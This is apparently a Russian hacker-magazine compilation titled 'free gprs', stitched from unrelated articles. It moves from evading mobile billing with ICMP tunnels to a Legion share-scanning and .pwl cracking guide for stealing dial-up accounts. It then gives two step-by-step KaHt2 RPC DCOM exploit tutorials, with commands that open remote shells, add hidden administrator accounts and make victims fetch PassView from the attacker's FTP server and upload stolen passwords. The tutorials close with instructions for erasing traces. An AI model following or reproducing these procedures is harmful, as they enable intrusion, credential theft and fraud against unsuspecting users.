free gprs

17
Честный обман оператора Мобильный интернет все еще остается дорогой игрушкой, доступной только избранным. Но не нужно быть хакером, чтобы удешевить трафик или даже сделать его бесплатным. И все это на совершенно легальных основаниях! Не потребуется даже умения держать дизассемблер в руках - достаточно простой инженерной смекалки. Несколько лет назад я стал счастливым обладателем сотового телефона с поддержкой GPRS (тогда они только-только начали появляться в наших краях). Штука удобная до чрезвычайности. Но расценки у оператора связи были просто грабительские ($600 за каждый гигабайт входящего или исходящего трафика). Я буквально не успевал вводить новые карточки, которые пожирал ненасытный телефон. Стало ясно: дальше так жить нельзя, и чтобы не остаться без штанов с одиноко торчащим хвостом, нужно было срочно что-то предпринять. Но что?! Атаковать сервер оператора, пытаясь проникнуть в биллинговую базу данных? За это могут и хвост оторвать, да и не стоит оно того. Это все равно, что разбивать витрину магазина ради пачки сигарет. Взлом должен был быть предельно честным и обеспечивать долгое время халявы в интернете. Он должен был быть таким, чтобы его не прикрыли через несколько дней после начала использования. Не прошло и недели, как решение было найдено. Работа через proxy-сервер Сетевые протоколы уже не первый десяток лет поддерживают возможность "прозрачного" сжатия информации "на лету". Однако оплата взимается за несжатый трафик, да и степень сжатия относительно невелика: упаковщикам приходится обрабатывать крохотные порции информации, разбитые на пакеты, на которых особо не развернешься, и ни в коем случае им нельзя задерживать управление на время больше нескольких миллисекунд, чтобы не снижать пропускную способность, в которой оператор заинтересован превыше всего. Мы же будем сжимать трафик RAR'ом или Zip'ом, степень сжатия которых просто шикарна. Почта и web-странички жмутся примерно в три-пять раз, снижая стоимость одного гигабайта до ~$150, а этим уже можно жить!

description

wRETRGTH

Transcript of free gprs

Page 1: free gprs

Честный обман оператора

Мобильный интернет все еще остается дорогой игрушкой, доступной только избранным. Но не нужно быть хакером, чтобы удешевить трафик или даже сделать его бесплатным. И все это на совершенно легальных основаниях! Не потребуется даже умения держать дизассемблер в руках - достаточно простой инженерной смекалки.

Несколько лет назад я стал счастливым обладателем сотового телефона с поддержкой GPRS (тогда они только-только начали появляться в наших краях). Штука удобная до чрезвычайности. Но расценки у оператора связи были просто грабительские ($600 за каждый гигабайт входящего или исходящего трафика). Я буквально не успевал вводить новые карточки, которые пожирал ненасытный телефон. Стало ясно: дальше так жить нельзя, и чтобы не остаться без штанов с одиноко торчащим хвостом, нужно было срочно что-то предпринять. Но что?! Атаковать сервер оператора, пытаясь проникнуть в биллинговую базу данных? За это могут и хвост оторвать, да и не стоит оно того. Это все равно, что разбивать витрину магазина ради пачки сигарет. Взлом должен был быть предельно честным и обеспечивать долгое время халявы в интернете. Он должен был быть таким, чтобы его не прикрыли через несколько дней после начала использования. Не прошло и недели, как решение было найдено.

Работа через proxy-сервер

Сетевые протоколы уже не первый десяток лет поддерживают возможность "прозрачного" сжатия информации "на лету". Однако оплата взимается за несжатый трафик, да и степень сжатия относительно невелика: упаковщикам приходится обрабатывать крохотные порции информации, разбитые на пакеты, на которых особо не развернешься, и ни в коем случае им нельзя задерживать управление на время больше нескольких миллисекунд, чтобы не снижать пропускную способность, в которой оператор заинтересован превыше всего.

Мы же будем сжимать трафик RAR'ом или Zip'ом, степень сжатия которых просто шикарна. Почта и web-странички жмутся примерно в три-пять раз, снижая стоимость одного гигабайта до ~$150, а этим уже можно жить!

Некоторые HTTP-proxy поддерживают такую опцию, как HTTP compression (сжатие http-содержимого), которая радикально ускоряет производительность и удешевляет web-серфинг. Еще нам потребуется web-браузер, "переваривающий" сжатые web-странички (FireFox и Opera переваривают их по умолчанию, а вот IE6 требует залезть в опции и включить поддержку HTTP/1.1). Просто пропиши адрес сервера (см. врезку) в настройках браузера - и все! К сожалению, бесплатность

Page 2: free gprs

этих серверов весьма условна и доступ к ним может прекратиться в любой момент, плюс скорость работы оставляет желать лучшего.

Google Web Accelerator

Известный поисковик Google недавно обзавелся новым сервисом - Web Accelerator (по-русски - "web-ускоритель"), один из трех китов которого состоит в сжатии http-содержимого перед отправкой клиенту. Два других кита - кеширование страничек и упреждающая загрузка (передача данных до посылки запроса). Клиентская часть акселератора выполнена в виде активной панели для Internet Explorer'а 6.х и FireFox 1.0+.Google Web Accelerator не только увеличивает скорость открытия страничек (а для тормозного GPRS'а это актуально), но и в три-пять раз удешевляет среднюю стоимость одного открытия (загрузка картинок, разумеется, должна быть отключена, иначе никакого выигрыша не получится). К сожалению, этот сервис не проработал и недели. Теперь на главной странице проекта webaccelerator.google.com нас ждет разочаровывающий текст: "Thank you for your interest in Google Web Accelerator. We have currently reached our maximum capacity of users and are actively working to increase the number of users we can support". В переводе это значит, что "...мы уже набрали кворум, и регистрация новых пользователей временно прекращена". Как говорится, кто не успел, тот опоздал...

Другие web-ускорители

Помимо Google, существуют и другие web-ускорители, которые легко найти в Сети, если, конечно, приказать поисковику отсеивать страницы, содержащие слово "Google" в своем теле. Все словно с ума сошли: только об одном Google Accelerator'е и говорят! Какой смысл пинать дохлую крысу? Так ведь нет, каждый считает своим долгом потеребить ее :).

Итак, реально работающие web-ускорители все-таки есть. Но и всякого зла, прикрывающегося их именем, тоже хватает! Часто под видом web-ускорителя предлагают банального трояна, устанавливающего систему удаленного администрирования или качающего рекламу за счет пользователя. Поэтому, прежде чем запускать полученный ускоритель, необходимо проверить его на вшивость, например, пропустив через антивирус, а в идеале – через дизассемблер.

Ускорители бывают как бесплатными, так и нет. Бесплатные лучше сразу оставить в покое: практически все они перегружены и работают кое-как. Но не платить же за ускоритель?! Конечно, нет. Многие коммерческие ускорители предлагают испытательный период, который легко продлить простой перерегистрацией. Даже если нас раскусят и пошлют в пешее путешествие с эротическим уклоном - не беда, так как

Page 3: free gprs

web-ускорителей пруд пруди. Не один, так другой. Какая тебе, в сущности, разница?

Роем тоннель через telnet

При всех своих достоинствах web-ускорители имеют множество серьезных ограничений. Начнем с того, что качество сжатия все же уступает последним версиям RAR'а и уступает довольно сильно. При перегрузке сервера-ускорителя возникают многочисленные ошибки передачи на TCP/IP-уровне, и данные приходится передавать снова и снова. Этот процесс протекает тайком от пользователя, но увеличивает время загрузки страниц и опустошает его денежный счет. А как насчет разрывов соединений, которые на GPRS'е случаются регулярно? Мелкие файлы автоматически кешируются сервером-ускорителем и могут быть докачаны без потерь. Но, начиная с некоторого размера, файлы отдаются "как есть", и если удаленный сервер работает без докачки, web-ускорителю останется только развести проводами. А почта? А осел? А куча других приложений?

Настоящие хакеры регистрируют Unix-аккаунт на быстром канале и подрубаются к нему удаленным доступом через GPRS по telnet или SSH-протоколу. Теперь данные из интернета скачиваются не напрямую, а идут через telnet/SSH-сервер. Со своего мобильного компьютера отдаешь команду скачать такой-то файл или даже целый сайт. Файл послушно скачивается, оседая на жестком диске промежуточного сервера. Если в процессе передачи соединение разорвется и придется начинать все сначала, никто за это уже не будет платить. Затем даешь команду: упаковать файл архиватором RAR (или, на худой конец, gzip) и отправить к тебе по GPRS. При желании можно пережать все рисунки, уменьшив их объем в несколько раз (пусть и с потерей качества). Трафик дешевеет прямо на глазах!Правда, хороший хостинг с telnet/SSH-доступом редко бывает бесплатным, и все-таки придется выложить порядка пары десятков баков в год. Но эти расходы стоят того, так как сэкономишь в десятки раз больше, чем при обычном состоянии дел. При наличии DSL-подключения можно установить SSH-сервер на своем домашнем компьютере. Идешь на www.openssh.com и выбираешь SSH по вкусу. В качестве сервера рекомендую SSHWindows, занимающий чуть больше двух мегабайт и работающий на всех Windows-платформах. Еще тебе потребуется SSH/SFTP-клиент, который установишь на мобильный компьютер с GPRS'ом. Поклонники командной строки могут не дергаться, поскольку в поставку SSHWindows уже входит все необходимое, а вот всем остальным придется поднапрячься. Лучшим графическим клиентом, по-моему, является Secure iXplorer, чем-то напоминающий Total Commander (в девичестве - Windows Commander). Пользователи FAR'а несомненно оценят плагин WinSCP со встроенным клиентом SFTP, новая версия которого вышла буквально несколько месяцев назад.

Page 4: free gprs

Управлять настольным компьютером через GPRS - это по-настоящему круто! И экономно. Пример: заходишь SSH-клиентом на свою тачку, запускаешь любимый The Bat, киляешь весь спам и передаешь по GPRS-каналу только актуальный контент. Если же письмо содержит несколько архивов с вложениями, распаковываешь их на настольном компьютере и передаешь через GPRS только содержимое архива, после чего решаешь, какие файлы нужны, а какие нет.

Роем тоннель через ICMP

Некоторые сотовые операторы тарифицируют только TCP/UDP-трафик, но не обращают внимания на ICMP. А это значит… что можно пробить ICMP-тоннель и тогда передача данных будет вообще бесплатной. Причем никто не сможем наехать и предъявить иск за взлом, поскольку мы вправе использовать все услуги, которые только предоставляет оператор! А вот отключить от Сети нас вполне могут, так что лучше не увлекаться и сотни гигабайт не воровать :).

Все, что потребуется - это установить ICMP-shell. На настольный компьютер - серверную часть, на мобильный - клиентскую (естественно, вместо настольного компьютера с DSL-соединением можно воспользоваться услугами любого хостера). Таких ICMP-shell'ов очень много. Популярна реализация Петра Киелтука (Peter Kieltyka), распространяемая в исходных текстах. Это обычный командный shell, однако его легко доработать до HTTP-proxy сервера, и тогда по бесплатному мобильному интернету можно будет бродить под Лисом или IE. Заработает и Осел (в смысле eMule – клиент файлообменной сети eDonkey), правда, только с lowID, но при бесплатном интернете с lowID жить вполне можно. Правда, следует сказать, что совсем бесплатным ослиный интернет не бывает: никакой хостер не позволит за пару десятков баксов тянуть безразмерный трафик и поэтому о выкачивании видеофильмов на халяву лучше сразу забыть.Конечно, ICMP-тоннель - штука достаточно хрупкая и по качеству связи заметно уступающая обычному TCP/IP-соединению. Низкая скорость, частные обрывы и т. д. Все это страшно нервирует и отнимает уйму времени. Тем не менее, все недостатки с лихвой компенсируются бесплатностью трафика!

Имеем

Всякая техническая проблема имеет простое и элегантное решение, даже если на первый взгляд кажется неразрешимой. Бесплатный мобильный интернет - это вполне реально. Конкретная схема взлома зависит от особенностей биллинговой системы сотового оператора, поэтому никаких универсальных рекомендаций дать невозможно. Главное - наметить общий маршрут. Подсказать, откуда рыть и в каком направлении копать. Что мы и сделали :).

Бесплатные proxy-серверы, поддерживающие сжатие

Page 5: free gprs

proxy.cs.gunma-u.ac.jp:8080

proxy.hoge.ac.jp:8080

proxy.res.anken.go.jp:8080

bi.ikenobo-c.ac.jp:80

proxy.infobears.ne.jp:80

Web-ускорители

PROPEL (www.propel.com)

Шикарный web-ускоритель, сжимающий не только текстовое содержимое, но и графические изображения, причем практически без потери качества. Поддерживает все версии Windows и браузеров (IE, Netscape, Opera, Mozilla и Firefox), дает семь дней пробного доступа.

Rabbit (www.khelekore.org/rabbit)

Наверное, лучший бесплатный web-ускоритель, сжимающий как текстовики, так и изображения. Поддерживает все версии Windows и браузеров (IE, Netscape, Opera, Mozilla и Firefox).

Программное обеспечение для взлома

SSHWindows (http://sshwindows.sourceforge.net)

Бесплатный консольный SSH/SFTP-клиент и сервер в одном флаконе, работающий под Windows.

Secure iXplorer GPL (www.i-tree.org/gpl/ixplorer.htm)

Бесплатный графический SSH/SFTP-клиент с интерфейсом а-ля Total Commander, работающий под Windows.

WinSCP (http://winscp.net/eng/index.php)

Бесплатный SFTP-плагин для FAR'а.

ICMP Shell (http://icmpshell.sourceforge.net)

Бесплатный ICMP Shell, работающий под Unix.

Page 6: free gprs

Трафик можно удешевить и легальными методами. Выигрывает тот, кто больше знает и умеет.

Прокачивать сжатую заранее информацию на порядок дешевле!

Не все web-ускорители одинаково хороши, а некоторые из них - замаскированные трояны.

Web-ускоритель Google не только самый оптимальный, но и самый перегруженный :).

Имея отдельный аккаунт на хостинге, можно скачивать, сортировать и архивировать информацию удаленно, не тратя лишние деньги.

Если твой оператор не тарифицирует ICMP, самое время пробить ICMP-тоннель.

А знаешь ли ты, друг мой, о том, как хакеры "вытаскивают" твои драгоценные аккаунты прямо у тебя из-под носа? Существует достаточно много случаев, когда пользователь с удивлением для себя обнаруживает, что за его счет бродит по просторам Интернет кто-то еще и, естественно, тратит направо и налево его потом и кровью заработанные деньги. Обнаружив столь неприятное происшествие, он в ярости (или в недоумении - кто как) звонит в техподдержку своего провайдера и объясняет причину своего недовольства. Провайдер приносит свои соболезнования, но, к сожалению, ничем помочь не может, однако, предлагает сменить пользователю пароль и советует не допускать до компьютера тех людей, которые не достойны доверия. А самое главное, что тем людям, которые платят свои деньги за часы, проведенные в Интернет, провайдер не собирается возмещать ни денег, ни времени. Разочаровавшись и обвиняя во всех мнимых грехах техническую поддержку, ты размышляешь о том, как же этому гадскому хакеру удалось украсть твой аккаунт, и с обидой в душе на этот жестокий мир подумываешь о смене провайдера. Итак, каким же образом хакер смог "вытащить" твой аккаунт?На сегодняшний день мне известны несколько методов, которые используют хакеры. Обычно многие юзеры, устанавливая Windows 95/98/NT под сети, предоставляют доступ к своим дискам и директориям другим пользователям сети, тем самым открывая лазейку в свой компьютер. Для того чтобы в сети найти компьютер с такой лазейкой, хакеру необходимо просканировать диапазон IP-адресов одной сетки. Что для этого нужно? Для Windows 95/98/NT - программа "Legion". После запуска этой программы нужно указать IP-адреса, которые будут использоваться для сканирования. Сначала хакер выбирает предполагаемого провайдера, услугами которого впоследствии он будет пользоваться. Например, это будет выдуманный нами

Page 7: free gprs

провайдер www.lamerishe.ru. Запустив свой mIRC, он отправляется на всем знакомый IRC и в окошке "status" пишет: /whois *.lamerishe.ru

Ответ не заставит себя ждать:#RUSSIAN Andrey H [email protected] :0 hello.*.junk.comEnd of /WHO list.

Дальше следует команда: /dns AndreyИ mIRC выдает ему IP-шник жертвы:

*** Looking up dialup-28059.lamerishe.ru*** Resolved dialup-28059.lamerishe.ru to 121.31.21.10Вот он уже и знает один из ip-адресов (121.31.21.10) нашего выдуманного провайдера. Теперь нужно указать диапазон IP-адресов этого провайдера. Хакер запускает Legion и заполняет поля "Enter Start IP" (введите начальный IP) и "Enter End IP" (введите конечный IP).

Enter Start IP: 121.31.21.1Enter End IP: 121.31.21.254Остается только выбрать скорость соединения и нажать на кнопку "Scan". Если после сканирования, в правом окне сканера, появится что-то вроде "\\121.31.21.87\C", то в левом окне можно открыть этот IP и щелкнуть два раза на ответвлении "C". Появится сообщение "MAPPED ON DRIVE E:". Все это означает, что на данном IP есть машина, c незашаренным (то есть открытым для всех) диском С. И этот диск можно установить как еще один диск на своем компе. То есть у хакера на компе появится еще один диск (в данном случае - Е), по которому он будет лазить, как по своему собственному, хотя он и находится на удаленной машине. Конечно, главной целью для хакера является файл с расширением .pwl, в котором находится зашифрованный аккаунт. Этот файл лежит в каталоге Windows. И поэтому хакер заходит в «Пуск -> Программы -> Сеанс MS-DOS». Пишет там «e:» и нажимает Enter. Теперь он на жестком диске у чайника. Но каталог Windows может называться по-другому. Поэтому он пишет: E:\>dir win* и получает такой вот ответ:

Том в устройстве Е не имеет меткиСерийный номер тома: 2247-15D0Содержимое каталога Е:\WIN95 <КАТАЛОГ> 11-30-98 6:48p WIN950 файл(а,ов) 0 байт1 каталог(а,ов) 287,997,952 байт свободно

Дальше следуют команды:

E:\>cd win95

Page 8: free gprs

E:\WIN95>dir *.pwlТом в устройстве Е не имеет меткиСерийный номер тома: 2247-15D0Содержимое каталога Е:\WIN95ANDREY PWL 730 02-05-99 10:31p ANDREY.PWL1 файл(а,ов) 730 байт0 каталог(а,ов) 287,997,952 байт свободноE:\WIN95>copy andrey.pwl c:\hacking\pwlhackТеперь, после копирования файла с расширением .pwl, хакеру нужно отсоединиться от этого компьютера. Он открывает иконку "Мой компьютер", выбирает иконку E:\121.31.21.87\C нажав правую кнопку мыши. Там жмет "Отсоединить". Что теперь? А теперь он берет программу pwlhack (newdata2.box.sk/neworder/crackpwd/pwlhck32.rar) и с помощью нее расшифровывает добытый файл andrey.pwl.

C:\HACKING\PWLHACK>pwlhack.exe /list andrey.pwl andrey(C) 17-Apr-1998y by Hard Wisdom "PWL's Hacker" v3.0 (1996,97,98)Enter the password:File 'ANDREY.PWL' has size 730 bytes, version [NEW_Win95_OSR/2]for user 'ANDREY' with password '' contains:-[Type]-[The resource location string]--------------[Password]-Dial X *Rna\Соединение с lamerishe\L5tRe fsa3Xfa12---------------------------------------------------------------Indexed Entryes: 1; Number of resources: 1.Настает кульминационный момент! Итак, теперь с помощью аккаунта, добытого у "чайника", хакер может лазить по просторам всемирной паутины Интернет. А вот и сам аккаунт:

Имя пользователя: L5tReПароль: fsa3Xfa12Если у данного провайдера можно посмотреть статистику прямо из Интернета, то, обычно, хакеры посещают сайт провайдера (в нашем примере www.lamerishe.ru) и смотрят, сколько осталось денег на счету у пользователя и в какое время он обычно находится в Интернете. Кстати, телефоны модемных пулов также можно узнать на сайте у провайдера. :)Существует еще несколько иных способов, таких как использование троянов Netbus1.0, Netbus Pro 2.0, BackOrifice и т.д. Самый простой из всех способов заключается в том, что, зная IP-адрес с открытыми сетевыми ресурсами, можно соединиться с компьютером, нажав на Пуск, выбрав "Поиск компьютера" и указав IP-адрес.«Все. Систему я понял. Теперь объясни-ка мне, как устранить лазейку и защитить себя от непрошеных гостей?» - скажешь ты. Хорошо. Для защиты от описанной выше дырки тебе будет необходимо отключить привязку (службу доступа к файлам и принтерам) от контроллера удаленного доступа (лезь в «Панель управления» -> «Сеть»), а в Windows NT нужно запретить службу Server в Remote Access WAN Wrapper. Но от НетБаса, БэкОрифиса и подобных троянов это тебя не спасет. А вот чтобы не подхватить трояна, во-первых, никогда не

Page 9: free gprs

подпускай никого к своему компьютеры со всякими дискетками, а, во-вторых, никогда не запускай у себя на компе никаких прог, в которых ты хоть на грамм сомневаешься. Последним хакерским способом по рассылке троянов был массовый спаминг с хоста microsoft.com, где в каждом письме лежал якобы патч к 4-му IE. Ну, а что этот «патч» делал, я думаю, ты уже догадался. :)

KaHt2 Берем что хотим[ Хакерство для новичков ]

НУ так вот приступим: КаХт2!Этот эксплоит испульзует всем известную дырку RPC DCOM в виндуса 2000 и ХП. Дырка эта конечно старая, и уже выпущенно большое количество исправлений. Но она остаётся актуальной (по крайней мере на моём прове много кого можно найти с этой темой). И мы можем пользоваться этой дырой до тех пор пока в сети будут сидеть под вынь 2000 и ХП.Короче, что нам понадобится? Да практически ничего, а именно это сам КаНт2, потом PassViev (только PRO версия, иначе ничего не получится) и естесственно программа FTP сервер, под названием pablos_ftp_server (я использовал версию 1_52). Ну вот и всё. Значит ищем всё это в инете. НАшли? Продолжаем.

Для удобства пользования Размещаем софт по винту в определённом порядке. Сам FTPServer, kaHt2.exe и EXPORT.BAT ставим в директорию C:/., А PassViev cуём в папку C:/TEMP (Если её нет, то создайте сами) и переименовываем PassViev.exe в 6.exe (для большего удобства), или в любое другое, на ваш выбор, главное что бы вы потом не мучались набирать это в командной строке.

EXPORT.BAT должен находится в одном архиве с КаХтом, если же всё-таки не нашли то создаём EXPORT.BAT файл своими руками в любимом блокноте с текстом

@Echo off6.exe Export.txt

и сохраняем как EXPORT.BAT. Всё Батник готов. Заметьте: во второй строке стоит 6.exe, это то имя в которое вы переименовали свой PassViev. Если Вы переименовали в другое то в напишите именно его в батнике EXPORT.BAT.

Теперь давайте настроим FTP сервер на своём компутере. Запустите FTPServer и войдите в User accounts, нажимаем ADD, Вас просят ввести имя юзера, пишем: a. Далее вас просят выбрать каталог куда будут заливатся стыренные файлы, выберете папку темп которую мы

Page 10: free gprs

недавно с Вами создавали на диске ЦЕ. Потом Вас просят ввести пароль для юзера a, парольставим тоже: a. Потом проставляем везде галочки. Теперь все изменения сохраняем и приступаем к основным действиям.

Открываем диск C:, убеждаемся что там присутствует КаХт. Потом Запускаем командную строку (пуск>программы>стандартные>командная строка). Перетаскиваем КаХт с папки в комндную строку (нажмите на КаХт левой кнопкой мыши и перетеащите в окно консоли).Далее появляется текст: C:>C:kahHt2.exeПродолжаем эту строку: пробел Должно получится: C:>C:kaHt2.exe 192.168.0.1 192.168.0.245 (пример на моей локалке, у Вас же диапазон может быть другой) Жмём Enter.

Перед Вами появляется:___________________________________________KAHT II - MASSIVE RPC EXPLOITDCOM RPC exploit. Modified by [email protected]#haxorcitos && #localhost @Efnet Ownz you!!!PUBLIC VERSION :P____________________________________________[+] tARGETS : 192.168.0.1-192.168.0.245 WITH 50 tHREADS[+] Attacking Port: 135. Remote Shell port: 32968[+] Scan In Progress...- Connecting to 192.168.0.8Sending Exploit to a [WinXP] Server... FAILED- Connecting to 192.168.0.13

ну короче говоря ещё всякое дерьмо появится которое нам не надо. В итоге когда сканер найдёт потенциальную жертву появится :

Microsoft Windows XP [Версия 5.1.2600](С) Корпорация Майкрософт, 1985-2001.C:windowssystem32>

Всё, можешь радоваться, ты на чужом компе в директории SYSTEM32.Далее в консоли пишем:cd.. Жмём Enter видим C:windows>cd..Жмём Enter видим C:

Теперь с помощью команды cd program files перейдём в папку С:Program Files.Видим:C:Program files сюда мы перешли чтоб особо не палитсяДалее узнаём свой IP адрес. Для премера будем использовать мой в локалке 192.168.0.7Пишем в консоли:

Page 11: free gprs

C:Program files>echo open 57.66.158.44>go.txt&&echo a>>go.txt&&echo a>>go.txt жмем EnterВидим: C:Program files>Это мы с Вами создали текстовый документ (он нам понадобится для соединения с вашим FTP сервером) в папке Program files на удалённой машине, в котором содержится 3 строки:open 57.66.158.44aaБуквы a, это имя и пароль которые Вы создали в FTPServer`е.

Теперь запускаем FTPServer , нажимаем на зелёную стрелочку в левом верхнем углу программы. Вам написали, что сервер запущен.Теперь коннектим удалённый комп к себе по FTP.Пишем в командной строке:C:Program files>ftp -s:go.txtВ своём FTP сервере, в раздел Server Log ты должен увидеть следующее:

FTP Server started on port 21[3892] Client connected from IP[3892] Welcome to Pablo's FTP Server[3892] USER a[3892] 331 Password required for a[3892] PASS a[3892] 230 User successfully logged in.

Это всё означает, что ты всё правильно сделал и законнектил вражеский комп к себе на ФТП, далее на надо залить PAssView.exe (мы переименовали его в 6.exe) на этот комп.Пишем get 6.exe жмём EnterВ своём FTP сервере, в раздел Server Log ты должен увидеть следующее:[1456] PORT IP[1456] 200 Port command successful.[1456] STOR 6.exe[1456] 150 Opening BINARY mode data connection for file transfer[1456] 226 Transfer complee

В консоли Пишем get export.bat жмём Enter - это мы отправили наш батник, видим В своём FTP сервере, в раздел Server Log ты должен увидеть следующее[1456] PORT IP[1456] 200 Port command successful.[1456] STOR Export.bat[1456] 150 Opening BINARY mode data connection for file transfer[1456] 226 Transfer complee

Page 12: free gprs

Всё, мы отправили необходимые файлы на комп жертвы.Теперь пишем bye - это мы отсоединяем комп от нашего ФТП сервера.

и снова мы видим:C:Program files>Пишем C:Program files>export.bat это мы запустили export.bat который соберёт нам все наши пароли и сохранит их в файле export.txtДля больше уверенности в том что export.txt уже создан наберите в консоли:C:Program files>dirИ Вы увидите все файлы и папки в директории C:Program files, там же увидите и наши закаченные файлы.

И наконец последний шаг.Снова коннектим комп по ФТП:C:Program files>ftp -s:go.txt жмём EnterВ своём FTP сервере, в раздел Server Log ты должен увидеть следующее:Вы снова увидите:FTP Server started on port 21[3892] Client connected from IP[3892] Welcome to Pablo's FTP Server[3892] USER a[3892] 331 Password required for a[3892] PASS a[3892] 230 User successfully logged in.

Сразу после этого в консоли вводите:send export.txtВ своём FTP сервере, в раздел Server Log ты должен увидеть следующее:[1456] PORT IP[1456] 200 Port command successful.[1456] STOR export.txt[1456] 150 Opening BINARY mode data connection for file transfer.[1456] 226 Transfer complete

Это означает что мы скопривали себе в папку TEMP,которую создавали на диске ЦЕ, файл export.txt

Далее заметаем следы:пишем bye жмём вводИ снова видим: C:Program files>Далее поочерёдно вводим команды для удаления закаченных нами файлов:del go.txtdel 6.exe

Page 13: free gprs

del export.batdel export.txt

Ну вот и всё.

Удачи!

Tarakanizator (aka Alexdirty) [email protected]

Эксплоит KAHT2.EXE. DCOM старая дыра в Win2000\XP

И так, мне поступили вопросы, как пользоваться KAHT 2. exe . Я уже писал на форуме про это ( http://www.znm.h11.ru/forum/forum.php?x=read&tema=6 ) , но этого оказалось не достаточно. Как видно из названия статьи, KAHT 2. exe эксплуатирует дыру RPC DCOM в операционных системах Win 2000\ XP . Хоть дырка старая и выпущены всевозможные исправления, но до сих пор актуальная. И будет актуальной, пока в инете есть компы под Win 2000\ XP .

Для взлома нам понадобиться: Сам KAHT2.exe ( http://www.securitylab.ru/exploits/kaht2.zip ); FTP сервер RPC Exploit GUI by r3L4x v2 ( http://www.securitylab.ru/?ID=39648 ); Прога PassView (pro версия, демо не сохраняет пароли в текстовый файл) или какой-нибудь Троян.

Вариант №1.

Запускаем через командную строку C:\kaht2.exe Х.Х.Х.Х Х.Х.Х.Х После подключения к жертве, печатаем команды:

net user machine c00lpassw0rd /add net localgroup Администраторы machine /add ( или Administrators для английской системы )

Теперь пользователь с именем machine (жертва примет его за системный аккаунт и побоится удалять) будет жить в системе, а хакер сможет удаленно прицепиться к компьютеру по протоколу NetBIOS. Реализует он вышесказанное командой net, выполненной со своего компьютера: net use disk:\\IPADDRESS\C$ Утилита спросит у взломщика имя пользователя и пароль к шаре. Он вводит аккаунт, который создал выше, и получает все права над файлами диска C:.

Этот метод актуален для локалки или через инет, если у жертвы установлен NetBIOS .

Page 14: free gprs

Вариант №2.

Считаем, что ты уже подключился к жертве. Дальше действуем так:

Запускай RPC Exploit GUI by r3L4x v2, жми на кнопку FTP Server, а там на Start. Тем самым ты запустил у себя на компе FTP сервер. Да и если у тебя включен виндовый брандмауэр, то отключи его. Дальше в KAHT2.exe пиши:

C :\ WINDOWS \ system 32> ftp

ftp

open x . x . x . x (твой IP ) Так ты подключил комп жертвы к своему по FTP .

Теперь закачиваем на взломанный комп PassView .

get /passview.exe ( файл C:\ passview.exe)

! passview.exe ( запускаем прогу )

PassView при запуске запишет все найденные ею пароли в файл export . txt

put export . txt (скачиваем себе файл с паролями export . txt )

Осталось замести следы.

del passview . exe

del export . txt

В архиве с RPC Exploit GUI by r 3 L 4 x v 2 есть отличная картинка, показывающая весь принцип работы эксплоита.

Ты уже, наверное, догадался, что вместо PassView можно использовать что угодно, Троян, клавиатурный шпион и т.д. и т.п.

Как защищаться ищи на форуме. Вот и все вроде.